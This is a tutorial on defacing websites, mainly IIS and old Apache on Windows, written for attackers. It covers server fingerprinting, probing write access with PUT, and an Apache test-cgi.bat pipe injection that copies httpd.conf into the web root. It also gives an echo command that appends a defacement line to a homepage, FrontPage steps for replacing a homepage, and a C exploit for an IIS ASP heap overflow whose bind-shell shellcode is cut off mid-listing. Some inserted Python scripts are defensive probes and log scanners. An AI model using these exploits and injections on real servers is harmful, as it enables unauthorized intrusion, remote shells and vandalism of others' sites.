

Defacing Websites
Defacing websites is one of the most talked-about activities both in the IT (Information Technology) world and in the underground (the hackers' world). Crackers, script kiddies and self-styled "uberhackers" build their reputations by defacing websites. It is not always about fame: sites are also defaced to spread a message to the public, and I have seen sites defaced purely for fun and amusement. In this article I will explain the mechanics of website defacement. In essence, a site is defaced by exploiting a vulnerability in the web server (or in what it hosts) to gain write access to the web root, often by way of a shell on the server, and then replacing or injecting content into the target page. I will explain how known vulnerabilities are exploited, with most of the examples aimed at Microsoft IIS, the server with the longest public record of remotely exploitable flaws at the time of writing.

Web Server Detection

Defacing websites is not hacking in any deep sense: it takes searching for exploits, some programming skill and a lot of trial and error. Every piece of software, including every website and web server, has vulnerabilities (mistakes in how the program works), and by exploiting one of them an attacker can gain privileged access (root or Administrator) to the system running the vulnerable software. Note that full root access is not strictly required for a defacement: write access to the directory holding the page is enough. Recently discovered vulnerabilities are published on sites like:

www.securityfocus.com
www.packetstormsecurity.com

These sites even offer the exploit code and the method of exploitation.

You can also find vulnerabilities in a web server or site yourself with a web security scanner.

Tools of Trade

- Nikto Security Scanner
- Stealth HTTP Security Scanner
- Acunetix Web Security Scanner

So, before defacing a website you must find out which server software it runs. Once you know the server software and its version, you look for vulnerabilities and exploits specific to it, so identifying the server software is essential.

Web server detection is easy and quite direct. When a request is sent to a web server, the server replies with a status line (200 OK, 400 Bad Request, 403 Forbidden, 404 Not Found and so on) followed by response headers, and by default most servers include a Server header giving the software name and version. So all we need to do is connect to port 80 of the web server with telnet, send a request in raw form, and read the headers of whatever comes back; even an error response such as 400 Bad Request carries the Server header.

NOTE: Port 80 is the default HTTP port for web servers.

C:\> telnet www.hackingtheworld.ilitehost.com 80
GET / HTTP/1.1
Host: www.hackingtheworld.ilitehost.com
<enter>

HTTP/1.1 403 Forbidden
Date: Fri, 17 Mar 2006 13:00:20 GMT
Server: Apache/1.3.22 (Win32)
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access / on this server.<P>
<HR>
<ADDRESS>Apache/1.3.22 Server at www.apache.org Port 80</ADDRESS>
</BODY></HTML>

Connection to host lost.

I connected to www.hackingtheworld.ilitehost.com on port 80 with telnet, so that is what appeared in my command prompt.

So the whole method is reading the telnet response. Connect to the web server or website on port 80.

NOTE: I used the domain name; you can telnet to the IP address as well.

After connecting you will see a blank screen (the Windows telnet client does not echo what you type by default). Type a request line such as GET / HTTP/1.1 and press Enter, type Host: followed by the site's name and press Enter, then press Enter once more on an empty line: the blank line ends the request and the server responds. Do not type \r\n literally; those are just the line endings telnet sends when you press Enter. HTTP/1.1 requires the Host header; if you omit it most servers answer 400 Bad Request, which still carries the Server header. The server's software name and version appear in the Server: line of the response.
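Here is the same banner grab done from a script instead of by hand. This is an added example, not code from the original tutorial: it builds the request correctly (Host header, CRLF line endings, terminating blank line), reads the head of the response and pulls out the Server header. The SAMPLE_403 bytes are constructed from the Apache response quoted above, not captured from a host; grab_banner does the live request when given a hostname, and the hostname used in its default is an assumption.

```python
"""Fingerprint a web server from its raw HTTP response."""
import socket


def build_request(host, path="/", method="HEAD"):
    """Build a minimal, valid HTTP/1.1 request.

    HTTP/1.1 requires a Host header, and the request is terminated by a
    blank line (CRLF CRLF); the letters r and n are never typed literally.
    """
    return (f"{method} {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Connection: close\r\n\r\n").encode("ascii")


def parse_response(raw):
    """Return (status_code, headers) from the raw bytes of an HTTP response.

    Header names are lower-cased so lookups do not depend on server casing.
    Only the head is parsed; any body after the blank line is ignored.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    status_line = lines[0].split(" ", 2)
    if len(status_line) < 2 or not status_line[0].startswith("HTTP/"):
        raise ValueError(f"not an HTTP status line: {lines[0]!r}")
    code = int(status_line[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return code, headers


def server_banner(raw):
    """The Server header of a response, or None if the server does not send one."""
    _, headers = parse_response(raw)
    return headers.get("server")


def grab_banner(host, port=80, timeout=5.0):
    """Send HEAD / over a plain socket and return the Server header.

    HEAD is used so the server sends only headers; the status code does not
    matter, since 200, 400 and 403 responses all carry the banner.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host))
        raw = b""
        while b"\r\n\r\n" not in raw:
            chunk = sock.recv(4096)
            if not chunk:
                break
            raw += chunk
    return server_banner(raw)


# Constructed sample of the 403 response quoted in the text; not captured
# from a live host.
SAMPLE_403 = (b"HTTP/1.1 403 Forbidden\r\n"
              b"Date: Fri, 17 Mar 2006 13:00:20 GMT\r\n"
              b"Server: Apache/1.3.22 (Win32)\r\n"
              b"Connection: close\r\n"
              b"Content-Type: text/html; charset=iso-8859-1\r\n\r\n"
              b"<html>...</html>")

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(grab_banner(sys.argv[1]))      # live banner grab of the given host
    else:
        print(server_banner(SAMPLE_403))     # offline run on the constructed sample
```

Run it with a hostname to query a live server, or without one to see the parser work on the constructed sample. A server that returns no Server header, or a generic one, has simply been configured to hide it; the absence of a banner is not proof of any particular software.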

Examining the Web Server


If you are using Microsoft IIS (Internet Information Services), you will have noticed that a default installation keeps the website root in C:\Inetpub\wwwroot. The directories a web server exposes are called virtual directories, and each virtual directory carries its own set of permissions: Read, Write, execution of scripts, and execution of executables such as DLLs and server-side pages such as ASP or CGI. Below I describe how to analyse the permissions of a virtual directory on a web server.

READ ACCESS
When you visit a website in your browser you type in the domain name. What happens then? The browser resolves the domain name to an IP address through DNS and connects to port 80 (the HTTP port) of that address. For example, type www.hackingtheworld.ilitehost.com into the address bar; the IP (Internet Protocol) address of this site is 72.29.65.4, so the browser connects to 72.29.65.4 on port 80 and sends GET / with a Host header naming the site. The server maps / to whatever default document is configured (index.html, index.php, index.asp, index.jsp or similar) and returns it, so you land on Hacking the World's official website and read content served from its wwwroot. If wwwroot contains ASP, PHP or JSP pages, those server-side pages are executed and the generated HTML is passed to the browser (client) by IIS (server) or whichever web server is running. Being able to read a document from a directory shows that the directory is readable. Directories containing database files are normally denied read access for security reasons.

WRITE ACCESS
Before going into write access, a short word on HTTP. HTTP (Hyper Text Transfer Protocol) is an application protocol that runs over TCP/IP; it was designed for transferring files (resources) across the Internet, and the name says as much. Files can be downloaded from the server with HTTP, and HTTP/1.1 also defines methods (PUT and DELETE) for uploading and removing them.

NOTE: Whether an upload is accepted, and whether it requires authentication, is entirely up to the server's configuration; the protocol itself imposes no requirement either way.

Years ago servers were sometimes left accepting uploads from anyone. Administrators soon realised that this was a serious security hole and tightened their configurations. Nowadays web servers are designed and configured to grant write access only on selected virtual directories, and usually only to authenticated users.

TIP: Try telnetting a web server and find out some good information about the server and its behavior.

Now, I am going to explain some commonly used commands supported by a web server.

GET: Used by the browser (client) to request read access to a file residing on the server.

C:\> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com...
GET /index.html HTTP/1.1
Host: www.hackingtheworld.ilitehost.com
<enter>

Sidetrack: The HTML (Hyper Text Markup Language) source of the index.html page on the server is returned; if you request an ASP, PHP or other server-side page, the dynamically generated HTML is returned instead.

DELETE: The HTTP method for deleting a file on the web server (there is no DEL method; a server answers an unknown method with 400 Bad Request or 501 Not Implemented). It requires write access on the virtual directory holding the file.

C:\> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com...
DELETE /index.html HTTP/1.1
Host: www.hackingtheworld.ilitehost.com
<enter>

Sidetrack: Most probably you will get 403 Forbidden or 405 Method Not Allowed, since the wwwroot directory should never be writable by anonymous clients.

PUT: Creates (or replaces) a file on the server; it requires write access on the virtual directory where the file is to be created. The request must carry a Content-Length header, then a blank line, then exactly that many bytes as the file's contents.

C:\> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com...
PUT /cc.txt HTTP/1.1
Host: www.hackingtheworld.ilitehost.com
Content-Length: 5
<enter>
hello

Sidetrack: Most probably you will get 403 Forbidden or 405 Method Not Allowed, since the wwwroot directory should never be writable by anonymous clients.

ECHO: This is not an HTTP method at all; it is the DOS (Disk Operating System) shell command used in batch files, and its output can be redirected with > or >>. Sending it to a web server as if it were a request only earns you a 400 Bad Request or 501 Not Implemented. It becomes useful once you can run commands on the server, for instance through the CGI command injection described later under Directory Surfing, where a command such as

echo Site defaced by S.B. >> ..\htdocs\index.html

appends your line to the homepage.

TIP: S.B. is the acronym of my name, Shubham Bhattacharya. When defacing a site you can use the initials of your own name.

PROPFIND: A WebDAV method that asks the server for the properties of a resource; with a Depth: 1 header it lists the children of a directory, which is what makes it useful for directory surfing.

NOTE: On IIS it belongs to the WebDAV extension, which IIS 5.0 installs and enables by default and which administrators use for remote authoring and analysis of the web server.

C:\> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com...
PROPFIND / HTTP/1.1
Host: iis-server
Depth: 1
Content-Length: 0
<enter>

Sidetrack: PROPFIND needs read access and WebDAV enabled, not write access. If WebDAV is disabled or the directory forbids it you will get 403 Forbidden or 501 Not Implemented; if it works, the server returns a 207 Multi-Status response whose XML body lists the directory's entries.

You must be wondering how to test the write permission of a particular directory on an IIS server.

To test the write permission for a particular directory on an IIS server, follow the steps given below:

- To test whether write permission is enabled for anonymous web clients, telnet to the web server or website on port 80 and make the following request (the blank line after Content-Length ends the headers):

PUT /scripts/htw.asp HTTP/1.1
Host: iis-server
Content-Length: 10
<enter><enter>

Because the request announces a body, IIS answers first with an interim 100 Continue:

HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Sun, 17 Feb 2006 10:53:00 GMT

On receiving this, type exactly 10 characters, XXXXXXXXXX, as the body.

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 17 Feb 2006 10:56:08 GMT
Location: http://iis-server/scripts/htw.asp
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

If the server responds with 201 Created, write permission is enabled; the Allow header also lists every WebDAV method the server accepts. A 403 Forbidden or 405 Method Not Allowed means it is not, and a 401 Unauthorized means writing exists but requires credentials. Note what the file name in the example implies: /scripts is normally a directory with Scripts and Executables permission, so a directory that is both writable and executable lets an attacker upload an ASP page and run it, which is far worse than a defacement. Delete any probe file you created.
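The same write-access probe as a script, added here as an example and not part of the original tutorial. It sends OPTIONS to read the Allow header, PUTs a small text file (a .txt rather than an .asp, so nothing executable is left behind), classifies the result and deletes the probe again if it was created. Python's http.client consumes the interim 100 Continue before handing back the final status. The host name, directory and verdict labels are assumptions of this example.

```python
"""Probe a virtual directory for anonymous write access over HTTP."""
import http.client


def parse_allow(value):
    """Turn an Allow header ("OPTIONS, TRACE, GET, ...") into a set of methods."""
    if not value:
        return set()
    return {m.strip().upper() for m in value.split(",") if m.strip()}


def classify_put(status):
    """What a PUT's status code says about the target directory."""
    if status in (201, 204):
        return "writable"        # file created (201) or replaced (204)
    if status == 401:
        return "auth-required"   # writing exists but needs credentials
    if status in (403, 405, 501):
        return "refused"         # forbidden, method not allowed, not implemented
    return f"unknown({status})"  # report rather than guess


def _send(host, port, method, path, body=None, timeout=5.0):
    """One request on a fresh connection; returns (status, lower-cased headers).

    http.client reads and discards the interim "100 Continue" that IIS sends
    before the final status, so only the final answer comes back here.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request(method, path, body=body, headers={"Host": host})
        resp = conn.getresponse()
        resp.read()  # drain the body so the response is complete
        return resp.status, {k.lower(): v for k, v in resp.getheaders()}
    finally:
        conn.close()


def probe_write_access(host, directory="/scripts/", port=80):
    """Return (allowed_methods, verdict) for one virtual directory.

    The probe file is plain text (never a script) and is deleted again if the
    server created it. Run only against hosts you are authorised to test.
    """
    probe = directory.rstrip("/") + "/write-probe.txt"   # assumed harmless name
    _, headers = _send(host, port, "OPTIONS", directory)
    allowed = parse_allow(headers.get("allow"))
    status, _ = _send(host, port, "PUT", probe, body=b"XXXXXXXXXX")
    verdict = classify_put(status)
    if verdict == "writable":
        _send(host, port, "DELETE", probe)   # clean up the probe file
    return allowed, verdict


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        sys.exit("usage: probe.py host [directory]")
    print(probe_write_access(sys.argv[1], *sys.argv[2:3]))
```

The two results should be read together: PUT listed in Allow but a 401 on the upload is the healthy state (WebDAV present, authoring protected), whereas "writable" on a directory that also carries execute permission is the case to escalate immediately.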

EXECUTION ACCESS

Server-side pages such as ASP, PHP and JSP, and ISAPI DLLs, are used in database-driven dynamic websites; they generate the HTML on the fly and send it to the client (web browser). These server-side pages and other executables, including DLL and EXE files, need execute permission on the virtual directory in which they are kept.

NOTE: Because DLLs and EXEs need execute permission, they are normally kept together in one dedicated virtual directory (such as /scripts on IIS) rather than scattered through the web root, so that execute permission can be granted there alone.

DIRECTORY SURFING
Web servers, or more precisely their virtual directories, are sometimes configured to offer directory browsing to all clients, or to selected clients after proper authentication. Directory browsing means you can list the files and folders present in a virtual directory, just as you would on your own machine. Most administrators turn this feature off, but a vulnerability in the server can still be used to obtain a listing of a directory, or to copy a file into a place where it can be read.

EXPLOIT FOR DIRECTORY LISTING IN APACHE
If you are not familiar with Apache, a brief description: Apache is configured through directives in text files rather than through a GUI, and the main file is httpd.conf, which on a typical Windows installation lives in c:\apache group\apache\conf. This file holds all the settings of the web server, so if we get our hands on it we learn the location of the log files, directory permissions, write access, authentication requirements and so on.

Now to the exploit. Apache for Windows can run batch files as CGI programs, and the cgi-bin directory of those installations contained one named test-cgi.bat, whose only purpose is to test that the cgi-bin directory works.

NOTE: The cgi-bin directory holds the CGI and Perl scripts.

The cgi-bin virtual directory obviously has execute permission. A batch-file CGI is run by handing it to the DOS (Disk Operating System) command interpreter, and old Apache for Windows builds passed the query string to the interpreter without escaping it. So a | (pipe) character in the query string ends the batch file's command line and starts a command of our own, which runs on the remote server. This was fixed in Apache 1.3.24 for Windows, so it only works against unpatched installations.

NOTE: If you do not know how to type the | (pipe) character, hold Shift and press the \ key, which is usually just beside Backspace. In a URL you can also write it encoded as %7C.

So the attack URL will be like this (spaces are written as +):

http://www.target.com/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf

Through the above URL I have copied httpd.conf from the conf directory into htdocs. The conf directory is not under the Apache web root (the htdocs virtual folder), so it cannot be fetched directly; the copy can be, using the following URL:

http://target.com/httpd.conf

since it now sits in the Apache web root. Through this method you obtain httpd.conf, and from it a great deal of useful information about the web server.
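Every such request is written to Apache's access log, so the pattern is easy to spot after the fact. The scanner below is an added example, not part of the original tutorial: it reads common-log-format lines, percent-decodes the query string of any request aimed at a .bat or .cmd CGI, and reports the ones containing a pipe together with the decoded command, so that an encoded %7C does not slip past. The log lines are constructed for the example; the client addresses and timestamps are made up.

```python
"""Spot batch-file CGI command injection in an Apache access log."""
import re
from urllib.parse import unquote

# Apache common log format: client ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+')

BATCH_CGI_RE = re.compile(r'\.(bat|cmd)$', re.I)


def injected_command(request_line):
    """Return the decoded query string if the request pipes a command into a
    .bat/.cmd CGI, otherwise None.

    The query is decoded first ('+' and '%20' are spaces, '%7C' is the pipe),
    so encoding the pipe does not hide the request from this check.
    """
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    path, _, query = parts[1].partition("?")
    if not BATCH_CGI_RE.search(path):
        return None
    decoded = unquote(query.replace("+", " "))
    return decoded if "|" in decoded else None


def scan_access_log(lines):
    """Yield (client, time, request, decoded_query) for each suspicious line."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a common-log-format line; skip rather than guess
        cmd = injected_command(m.group("request"))
        if cmd is not None:
            yield m.group("client"), m.group("time"), m.group("request"), cmd


# Constructed log lines for the example (made-up clients and times): the
# httpd.conf copy from the text, an encoded variant aimed at the logs
# directory, and two harmless requests.
SAMPLE_LOG = [
    '203.0.113.9 - - [17/Mar/2006:13:00:20 +0000] '
    '"GET /cgi-bin/test-cgi.bat?|copy+..\\conf\\httpd.conf+..\\htdocs\\httpd.conf HTTP/1.1" 200 312',
    '203.0.113.9 - - [17/Mar/2006:13:00:41 +0000] "GET /httpd.conf HTTP/1.1" 200 9871',
    '198.51.100.4 - - [17/Mar/2006:13:02:05 +0000] '
    '"GET /cgi-bin/test-cgi.bat?%7Cdel+/q+..%5Clogs%5C*.* HTTP/1.1" 200 0',
    '198.51.100.7 - - [17/Mar/2006:13:03:11 +0000] "GET /cgi-bin/test-cgi.bat?hello+world HTTP/1.1" 200 230',
    '192.0.2.1 - - [17/Mar/2006:13:04:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, when, request, cmd in scan_access_log(SAMPLE_LOG):
        print(f"{when} {client} -> {cmd!r}   ({request})")
```

A hit followed shortly by a successful GET of a file that should not be in the web root (as with the httpd.conf fetch in the second sample line) is the sequence to look for; the fix on the server side is simply to run a patched Apache and to keep no batch files in cgi-bin.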

Inspecting known vulnerabilities

Websites are generally hacked and defaced through vulnerabilities in the server software or in the operating system it runs on. Most hackers deface websites by exploiting such vulnerabilities; I am talking about hackers, not script kiddies, who deface websites with point-and-click tools. So you must know what a vulnerability is: an existing flaw or defect in a piece of software that allows a hacker or cracker to take control of the system or run arbitrary commands on the server. Every piece of software, application or tool has vulnerabilities.

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

The above sites publish the latest vulnerabilities along with exploit code. Even if you are an elite or a professional, you will find the information useful.

Working with Exploits


This is the most exciting part of the tutorial. Suppose www.victim.com is the target site. Using the methods explained earlier we have found that the website runs on Microsoft IIS. Now it is time to find a vulnerability; I use Acunetix Web Security Scanner to scan for them. You should know a programming language such as C or Perl, including socket programming, because exploits are distributed as source code and you will have to compile or adapt them. Once you have a vulnerability, try exploiting it, in the simplest case by sending the malformed request from your client (browser).

MICROSOFT FRONTPAGE EXTENSIONS EXPLOIT

This is a method of defacement using the Microsoft Web Publishing Wizard. With it one can replace pages on websites that have FrontPage Server Extensions installed and have left authoring open. Follow the steps below.

Telnet to the target website or web server on port 80:

C:\> telnet www.victim.com 80

You will get a blank screen. Type GET and keep pressing Enter until the web server responds.

GET <ENTER><ENTER>

NOTE: On Windows 2000 Server the IIS installation includes the FrontPage 2000 Server Extensions by default, but authoring through them is supposed to require an author's credentials. This method only works where the administrator has left authoring open to anonymous users. A quick check for the extensions themselves: request /_vti_inf.html; if it exists, they are installed.

After pressing Enter you will get something like the following (GET without a path or version is a bad request, but the Server header is still returned):

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Thu, 17 Feb 2006 04:18:45 GMT
Content-Type: text/html
Content-Length: 87

Once you have confirmed the server, you have to find the homepage. Most sites use one of the following as the default document:

http://www.victimserver.com/main.asp
http://www.victimserver.com/index.html
http://www.victimserver.com/index.htm
http://www.victimserver.com/index.asp
http://www.victimserver.com/main.htm
http://www.victimserver.com/default.htm
http://www.victimserver.com/default.asp
http://www.victimserver.com/default.html

Keep trying these names until one loads; a name that does not exist returns a 404 error. Let us say the homepage turns out to be www.victim.com/index.html. Design the page you want to upload, or modify the homepage, and save it as index.html.

Now open the Web Publishing Wizard and follow the steps below.

- Open Microsoft Web Publishing Wizard.
- Browse to the file you are going to upload; here it is index.html.
- On the next screen you are asked to name the web server. Type anything and click Advanced.
- Select the service provider from the drop-down box. This is the upload method; since the aim is to replace a FrontPage page, choose "FrontPage Extended Web", as this method only works on FrontPage-enabled sites.
- Type the URL of the victim server's homepage in the box provided, here www.victim.com/index.html; this is the URL you would type into a browser to reach the page.
- Select the connection method you use to access the Internet.
- Click Finish. If the server accepts the upload without asking for credentials, the victim's homepage has been replaced with yours. If it prompts for a username and password, authoring is protected and this method fails.
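A scripted version of the FrontPage check described above, added here as an example and not part of the original tutorial. It fetches /_vti_inf.html, which every FrontPage-extended web publishes, parses the RPC endpoint names out of it, then calls the author endpoint once without credentials to see whether it answers (200) or demands a login (401). The sample file contents are constructed from the usual layout of _vti_inf.html, and the open-service request body is an assumption based on the call the FrontPage client makes; verify both against a real server before relying on the verdict.

```python
"""Detect FrontPage Server Extensions and test whether authoring is open."""
import re
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# _vti_inf.html is an HTML comment of KEY="value" lines naming the RPC
# endpoints. This sample is constructed from the usual layout of that file;
# the version string is an assumption.
SAMPLE_VTI_INF = """<!-- FrontPage Configuration Information
 FPVersion="4.0.2.2611"
 FPShtmlScriptUrl="_vti_bin/shtml.dll/_vti_rpc"
 FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll"
 FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll"
 TPScriptUrl="_vti_bin/owssvr.dll"
-->
<html><body>FrontPage Configuration Information</body></html>
"""

VTI_KV_RE = re.compile(r'^\s*(\w+)="([^"]*)"', re.M)


def parse_vti_inf(text):
    """Return the KEY="value" pairs of a _vti_inf.html page, or {} if it is not one."""
    if "FrontPage Configuration Information" not in text:
        return {}
    return dict(VTI_KV_RE.findall(text))


def classify_author_access(status):
    """Interpret the status of an unauthenticated call to author.dll."""
    if status == 200:
        return "anonymous-authoring"   # the RPC answered without credentials
    if status == 401:
        return "auth-required"         # extensions present, authoring protected
    if status in (403, 404):
        return "not-exposed"
    return f"unknown({status})"


def _fetch(url, data=None, headers=None):
    """GET (or POST when data is given); 4xx/5xx answers are returned as
    statuses instead of being raised."""
    try:
        with urlopen(Request(url, data=data, headers=headers or {}), timeout=5.0) as resp:
            return resp.status, resp.read().decode("iso-8859-1", "replace")
    except HTTPError as err:
        return err.code, ""


def check_frontpage(host, port=80):
    """Return (info, verdict): the parsed _vti_inf.html and the authoring verdict."""
    base = f"http://{host}:{port}"
    status, text = _fetch(base + "/_vti_inf.html")
    info = parse_vti_inf(text) if status == 200 else {}
    if not info:
        return {}, "no-frontpage"
    # First RPC the FrontPage client sends when opening a web; assumed from
    # the client's call format, so confirm it against a real server.
    version = info.get("FPVersion", "4.0.2.2611")
    body = f"method=open service:{version}&service_name=/".encode("ascii")
    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "X-Vermeer-Content-Type": "application/x-www-form-urlencoded"}
    status, _ = _fetch(base + "/" + info["FPAuthorScriptUrl"], body, headers)
    return info, classify_author_access(status)


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(parse_vti_inf(SAMPLE_VTI_INF))   # offline run on the sample
    else:
        print(check_frontpage(sys.argv[1]))
```

"auth-required" is the expected answer from a properly set-up server; "anonymous-authoring" is the condition the Web Publishing Wizard method depends on, and the administrator's fix is to require authentication on the _vti_aut and _vti_adm directories or to remove the extensions altogether.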

Overworking known vulnerabilities to break into a server


Before going deeper into vulnerabilities you need to understand how exploits are coded. Below is an exploit written in C, the language most native exploits are written in.

/* Windows 2000 Server Exploit By CHINANSL Security Team.
   Test on Windows 2000 Chinese Version, IIS 5.0, not patched.
   Warning: THIS PROGRAM WILL ONLY TEST.
   CHINANSL Technology CO.,LTD   http://www.chinansl.com   keji@chinansl.com

   Use MS VC++ to compile this piece of code.

   What it does: sends a POST to an .asp page with Transfer-Encoding: chunked
   whose chunks overflow the ASP ISAPI chunked-encoding handler (the heap
   overrun Microsoft fixed in MS02-018), carrying shellcode that binds cmd.exe
   to TCP port 1111. The two addresses below are hard-coded for the Chinese
   Windows 2000 build the authors tested on; on any other build they have to
   be found again. */

#include "stdafx.h"        /* MSVC precompiled header; remove if not using one */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>       /* pulls in the winsock 1.1 declarations */
#pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[])
{
    if(argc != 4)
    {
        printf("%s ip port aspfilepath\n\n",argv[0]);
        printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n",argv[0]);
        puts(" programed by keji@chinansl.com");
        return 0;
    }

    DWORD srcdata=0x01e2fb1c-4;   /* address of SHELLCODE (alternative: 0x00457474) */
    DWORD jmpaddr=0x00457494;     /* return address (alternatives: 0x77ebf094, 0x01e6fcec) */

    char* destIP=argv[1];
    char* destFile=argv[3];
    int webport=atoi(argv[2]);
    char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP";   /* 16 bytes */

    WSADATA ws;
    SOCKET s;
    long result=0;
    if(WSAStartup(0x0101,&ws) != 0)
    {
        puts("WSAStartup() error");
        return -1;
    }

    struct sockaddr_in addr;
    addr.sin_family=AF_INET;
    addr.sin_port=htons(webport);
    addr.sin_addr.s_addr=inet_addr(destIP);
    s=socket(AF_INET,SOCK_STREAM,0);
    if(s==INVALID_SOCKET)
    {
        puts("Socket create error");
        return -1;
    }

    if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == SOCKET_ERROR)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }

    char buff[4096];

    /* Bind-shell payload: resolves the kernel32/wsock32 exports it needs,
       creates a listening socket on port 1111 and attaches cmd.exe to it.
       Contains no NUL byte, so strlen() gives its length. */
    char* shellcode=
        "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
        "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
        "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
        "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
        "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
        "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
        "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
        "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
        "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
        "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
        "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
